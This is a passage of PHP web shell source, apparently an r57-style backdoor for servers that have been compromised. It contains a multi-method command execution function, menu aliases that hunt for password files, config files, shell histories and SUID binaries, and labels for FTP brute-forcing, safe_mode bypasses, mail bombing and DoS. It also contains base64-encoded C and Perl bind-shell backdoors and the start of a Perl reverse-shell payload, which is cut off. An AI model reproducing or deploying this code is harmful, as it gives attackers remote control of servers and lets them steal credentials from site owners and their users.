'eng_text73'=>'Find in folder',
'eng_text74'=>'Find in files',
'eng_text75'=>'* you can use regexp',
'eng_text76'=>'Search text in files via find',
'eng_text80'=>'Type',
'eng_text81'=>'NetTools',
'eng_text82'=>'Databases',
'eng_text83'=>'Run SQL query',
'eng_text84'=>'SQL query',
'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
'eng_text86'=>'Download files from server',
'eng_butt14'=>'Download',
'eng_text87'=>'Download files from remote ftp-server',
'eng_text88'=>'Server : Port',
'eng_text89'=>'File on ftp',
'eng_text90'=>'Transfer mode',
'eng_text91'=>'Archivation',
'eng_text92'=>'without arch.',
'eng_text93'=>'FTP',
'eng_text94'=>'FTP-bruteforce',
'eng_text95'=>'Users list',
'eng_text96'=>'Can\'t get users list',
'eng_text97'=>'checked: ',
'eng_text98'=>'success: ',
'eng_text99'=>'/etc/passwd',
'eng_text100'=>'Send file to remote ftp server',
'eng_text101'=>'Use reverse (v4 Team -> 401bmh)',
'eng_text102'=>'Mail',
'eng_text103'=>'Send email',
'eng_text104'=>'Send file to email',
'eng_text105'=>'To',
'eng_text106'=>'From',
'eng_text107'=>'Subj',
'eng_butt15'=>'Send',
'eng_text108'=>'Mail',
'eng_text109'=>'Hide',
'eng_text110'=>'Show',
'eng_text111'=>'SQL-Server : Port',
'eng_text112'=>'Test bypass safe_mode with function mb_send_mail (PHP <= 4.0-4.2.2, 5.x)',
'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list (PHP <= 5.1.2)',
'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body (PHP <= 5.1.2)',
'eng_text115'=>'Test bypass safe_mode, copy file via copy[compress.zlib://] (PHP <= 4.4.2, 5.1.2)',
'eng_text116'=>'Copy from',
'eng_text117'=>'to',
'eng_text118'=>'File copied',
'eng_text119'=>'Cant copy file',
'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',
'eng_text122'=>'Test bypass open_basedir, view dir list via glob (PHP <= 5.2.x)',
'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
'eng_text124'=>'Test bypass open_basedir, add data to file via error_log[php://] (PHP <= 5.1.4, 4.4.2)',
'eng_text125'=>'Data',
'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
'eng_text127'=>'Test bypass open_basedir, add data to file via readfile[php://] (PHP <= 5.2.1, 4.4.4)',
'eng_text128'=>'Modify/Access date(touch)',
'eng_text129'=>'Test bypass open_basedir, create file via fopen[srpath://] (PHP v5.2.0)',
'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
'eng_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
'eng_text133'=>'',
'eng_text134'=>'Database cracker',
'eng_text135'=>'Dictionary',
'eng_text136'=>'Creating evil symlink',
'eng_text137'=>'Useful',
'eng_text138'=>'Dangerous',
'eng_text139'=>'Mail Bomber',
'eng_text140'=>'DoS',
'eng_text141'=>'USE CAREFULY - This may harm your web domain.',
'eng_err0'=>'Error! Can\'t write to the file ',
'eng_err1'=>'Error! Can\'t read the file ',
'eng_err2'=>'Error! Can\'t create ',
'eng_err3'=>'Error! Can\'t connect to FTP',
'eng_err4'=>'Error! Can\'t login on ftp server',
'eng_err5'=>'Error! Can\'t change dir on FTP',
'eng_err6'=>'Error! Can\'t sent mail',
'eng_err7'=>'Mail send',
);

$aliases=array(
'----------------------------------locate'=>'',
'locate httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate my.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate my.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate admin.php >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate conf.php >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.dat >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate config.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.php >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.inc >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate .conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".conf" >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate .pwd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".pwd" >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate .sql files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".sql" >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".htpasswd" >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".bash_history" >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".mysql_history" >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate backup files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate backup >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate dump files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate dump >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate priv files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate priv >> /tmp/grep.txt;cat /tmp/grep.txt',
'----------------------------------tar'=>'',
'tar -czvf all.tgz -T /tmp/grep.txt'=>'tar -czvf all.tgz -T /tmp/grep.txt',
'----------------------------------1'=>'',
'locate access_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate access_log >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate error_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate error_log >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate access.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate access.log >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate error.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate error.log >> /tmp/grep.txt;cat /tmp/grep.txt',
'locate ".log" files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".log" >> /tmp/grep.txt;cat /tmp/grep.txt',
'----------------------------------2'=>'',
'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt;cat /tmp/grep.txt'=>'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt',
'----------------------------------find'=>'',
'find suid files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -04000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
'find suid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -04000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
'find sgid files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -02000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
'find sgid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -02000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
'find all writable files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
'find all writable files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
'find all writable directories >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /  -type d -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
'find all writable directories in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type d -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
'find all writable directories and files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
'find all writable directories and files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
'find all .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .htpasswd  >> /tmp/grep.txt;cat /tmp/grep.txt',
'find all .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .bash_history  >> /tmp/grep.txt;cat /tmp/grep.txt',
'find all .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .mysql_history  >> /tmp/grep.txt;cat /tmp/grep.txt',
'find all .fetchmailrc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .fetchmailrc  >> /tmp/grep.txt;cat /tmp/grep.txt',
'find httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
'find vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
'find proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
'find admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name admin.php >> /tmp/grep.txt;cat /tmp/grep.txt',
'find config* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "config*"  >> /tmp/grep.txt;cat /tmp/grep.txt',
'find cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt',
'find conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name conf.php >> /tmp/grep.txt;cat /tmp/grep.txt',
'find config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.dat >> /tmp/grep.txt;cat /tmp/grep.txt',
'find config.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.php >> /tmp/grep.txt;cat /tmp/grep.txt',
'find config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.inc >> /tmp/grep.txt;cat /tmp/grep.txt',
'find config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt',
'find config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt',
'find *.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.conf" >> /tmp/grep.txt;cat /tmp/grep.txt',
'find *.pwd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.pwd" >> /tmp/grep.txt;cat /tmp/grep.txt',
'find *.sql files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.sql" >> /tmp/grep.txt;cat /tmp/grep.txt',
'find *backup* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*backup*" >> /tmp/grep.txt;cat /tmp/grep.txt',
'find *dump* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*dump*" >> /tmp/grep.txt;cat /tmp/grep.txt',
'-----------------------------------'=>'',
'find /var/ access_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name access_log >> /tmp/grep.txt;cat /tmp/grep.txt',
'find /var/ error_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name error_log >> /tmp/grep.txt;cat /tmp/grep.txt',
'find /var/ access.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name access.log >> /tmp/grep.txt;cat /tmp/grep.txt',
'find /var/ error.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name error.log >> /tmp/grep.txt;cat /tmp/grep.txt',
'find /var/ "*.log" files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name "*.log" >> /tmp/grep.txt;cat /tmp/grep.txt',
'----------------------------------------------------------------------------------------------------'=>'ls -la'
);
$table_up1  = "<tr><td bgcolor=#0C0C0C><font face=Verdana size=-2><b><div align=center>(+) ";
$table_up2  = " (-)</div></b></font></td></tr><tr><td>";
$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#FFFFFF><tr><td bgcolor=#0C0C0C>";
$table_end1 = "</td></tr>";
$arrow = " <font face=Webdings color=gray>4</font>";
$lb = "<font color=black>[</font>";
$rb = "<font color=black>]</font>";
$font = "<font face=Verdana size=-2>";
$ts = "<table class=table1 width=100% align=center>";
$te = "</table>";
$fs = "<form name=form method=POST>";
$fe = "</form>";

if(isset($_GET['users']))
 {
 if(!$users=get_users('/etc/passwd')) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
 else
  {
  echo '<center>';
  foreach($users as $user) { echo $user."<br>"; }
  echo '</center>';
  }
 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
 }

if (!empty($_POST['dir'])) { if(@function_exists('chdir')){@chdir($_POST['dir']);} else if(@function_exists('chroot')){ @chroot($_POST['dir']);}; }
if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];}
$unix = 0;
if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
if(empty($dir))
 {
 $os = getenv('OS');
 if(empty($os)){ $os = @php_uname(); }
 if(empty($os)){ $os ="-"; $unix=1; }
 else
    {
    if(@eregi("^win",$os)) { $unix = 0; }
    else { $unix = 1; }
    }
 }

if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
  {
    echo $head;
    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
    $sr->SearchText(0,0);
    $res = $sr->GetResultFiles();
    $found = $sr->GetMatchesCount();
    $titles = $sr->GetTitles();
    $r = "";
    if($found > 0)
    {
      $r .= "<TABLE width=100%>";
      foreach($res as $file=>$v)
      {
        $r .= "<TR>";
        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
        $r .= (!$unix)? str_replace("/","\\",$file) : $file;
        $r .= "</b></font></ TD>";
        $r .= "</TR>";
        foreach($v as $a=>$b)
        {
          $r .= "<TR>";
          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
          $r .= "</TR>\n";
        }
      }
      $r .= "</TABLE>";
    echo $r;
    }
    else
    {
      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
    }
  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  die();
  }

if(!$safe_mode && strpos(ex("echo abchmb"),"hmb")!=3) { $safe_mode = 1; }
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
function ws($i)
{
return @str_repeat("&nbsp;",$i);
}
function ex($cfe)
{
 $res = '';
 if (!empty($cfe))
 {
  if(@function_exists('exec'))
   {
    @exec($cfe,$res);
    $res = join("\n",$res);
   }
  elseif(@function_exists('shell_exec'))
   {
    $res = @shell_exec($cfe);
   }
  elseif(@function_exists('system'))
   {
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(@function_exists('passthru'))
   {
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(@is_resource($f = @popen($cfe,"r")))
  {
   $res = "";
   if(@function_exists('fread') && @function_exists('feof')){
    while(!@feof($f)) { $res .= @fread($f,1024); }
   }else if(@function_exists('fgets') && @function_exists('feof')){
    while(!@feof($f)) { $res .= @fgets($f,1024); }
   }
   @pclose($f);
  }
  elseif(@is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes)))
  {
   $res = "";
   if(@function_exists('fread') && @function_exists('feof')){
    while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);}
   }else if(@function_exists('fgets') && @function_exists('feof')){
    while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);}
   }
   @proc_close($f);
  }
  elseif(@function_exists('pcntl_exec')&&@function_exists('pcntl_fork'))
   {
    $res = '[~] Blind Command Execution via [pcntl_exec]\n\n';
    $pid = @pcntl_fork();
    if ($pid == -1) {
     $res .= '[-] Could not children fork. Exit';
    } else if ($pid) {
         if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';}
         else {$res .= '[-] Error. Command incorrect.';}
    } else {
         $cfe = array(" -e 'system(\"$cfe\")'");
         if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0);
         if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0);
         die();
    }
   }
 }
 return $res;
}
function get_users($filename)
{
  $users = array();
  $rows=@explode("\n",readzlib($filename));
  if(!$rows) return 0;
  foreach ($rows as $string)
   {
   $user = @explode(":",trim($string));
   if(substr($string,0,1)!='#') array_push($users,$user[0]);
   }
  return $users;
}
function err($n,$txt='')
{
echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#0C0C0C><font color=red face=Verdana size=-2><div align=center><b>';
echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
if(!empty($txt)) { echo " $txt"; }
echo '</b></div></font></td></tr></table>';
return null;
}
function perms($mode)
{
if (!$GLOBALS['unix']) return 0;
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
function in($type,$name,$size,$value,$checked=0)
{
 $ret = "<input type=".$type." name=".$name." ";
 if($size != 0) { $ret .= "size=".$size." "; }
 $ret .= "value=\"".$value."\"";
 if($checked) $ret .= " checked";
 return $ret.">";
}
function which($pr)
{
$path = '';
$path = ex("which $pr");
if(!empty($path)) { return $path; } else { return false; }
}
function cf($fname,$text)
{
 $w_file=@fopen($fname,"w") or @function_exists('file_put_contents') or err(0);
 if($w_file)
 {
 @fwrite($w_file,@base64_decode($text)) or @fputs($w_file,@base64_decode($text)) or @file_put_contents($fname,@base64_decode($text));
 @fclose($w_file);
 }
}
function sr($l,$t1,$t2)
 {
 return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
 }
if (!@function_exists("view_size"))
{
function view_size($size)
{
 if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
 elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
 elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
 else {$size = $size . " B";}
 return $size;
}
}
  function DirFilesR($dir,$types='')
  {
    $files = Array();
    if(($handle = @opendir($dir)) || (@function_exists('scandir')))
    {
      while ((false !== ($file = @readdir($handle))) && (false !== ($file = @scandir($dir))))
      {
        if ($file != "." && $file != "..")
        {
          if(@is_dir($dir."/".$file))
            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
          else
          {
            $pos = @strrpos($file,".");
            $ext = @substr($file,$pos,@strlen($file)-$pos);
            if($types)
            {
              if(@in_array($ext,explode(';',$types)))
                $files[] = $dir."/".$file;
            }
            else
              $files[] = $dir."/".$file;
          }
        }
      }
      @closedir($handle);
    }
    return $files;
  }
  class SearchResult
  {
    var $text;
    var $FilesToSearch;
    var $ResultFiles;
    var $FilesTotal;
    var $MatchesCount;
    var $FileMatschesCount;
    var $TimeStart;
    var $TimeTotal;
    var $titles;
    function SearchResult($dir,$text,$filter='')
    {
      $dirs = @explode(";",$dir);
      $this->FilesToSearch = Array();
      for($a=0;$a<count($dirs);$a++)
        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
      $this->text = $text;
      $this->FilesTotal = @count($this->FilesToSearch);
      $this->TimeStart = getmicrotime();
      $this->MatchesCount = 0;
      $this->ResultFiles = Array();
      $this->FileMatchesCount = Array();
      $this->titles = Array();
    }
    function GetFilesTotal() { return $this->FilesTotal; }
    function GetTitles() { return $this->titles; }
    function GetTimeTotal() { return $this->TimeTotal; }
    function GetMatchesCount() { return $this->MatchesCount; }
    function GetFileMatchesCount() { return $this->FileMatchesCount; }
    function GetResultFiles() { return $this->ResultFiles; }
    function SearchText($phrase=0,$case=0) {
    $qq = @explode(' ',$this->text);
    $delim = '|';
      if($phrase)
        foreach($qq as $k=>$v)
          $qq[$k] = '\b'.$v.'\b';
      $words = '('.@implode($delim,$qq).')';
      $pattern = "/".$words."/";
      if(!$case)
        $pattern .= 'i';
      foreach($this->FilesToSearch as $k=>$filename)
      {
        $this->FileMatchesCount[$filename] = 0;
        $FileStrings = @file($filename) or @next;
        for($a=0;$a<@count($FileStrings);$a++)
        {
          $count = 0;
          $CurString = $FileStrings[$a];
          $CurString = @Trim($CurString);
          $CurString = @strip_tags($CurString);
          $aa = '';
          if(($count = @preg_match_all($pattern,$CurString,$aa)))
          {
            $CurString = @preg_replace($pattern,"<SPAN style='color: #7DFF7D;'><b>\\1</b></SPAN>",$CurString);
            $this->ResultFiles[$filename][$a+1] = $CurString;
            $this->MatchesCount += $count;
            $this->FileMatchesCount[$filename] += $count;
          }
        }
      }
      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
    }
  }
  function getmicrotime()
  {
    list($usec,$sec) = @explode(" ",@microtime());
    return ((float)$usec + (float)$sec);
  }
$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5
cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N
CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy
ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1
Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f
ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p
KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm
ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi
c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl
LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h
Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN
CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy
ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp
DQogICBzeXN0ZW0oImVjaG8gWW91IGFyZSB1c2luZyBITUJyNTcgU1NIIGxpbmUgLWkiKTsNCiAg
IGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJXcm9uZyBQYXNzd29yZCIpOw0KICAgY2xvc2UobmV3
ZmQpOw0KICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7
DQppbnQgaTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRb
aV0gPT0gJ1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykN
CmVudGVyZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVy
biAwOw0KfQ==";

$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
lIENPTk47DQpleGl0IDA7DQp9DQp9";

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
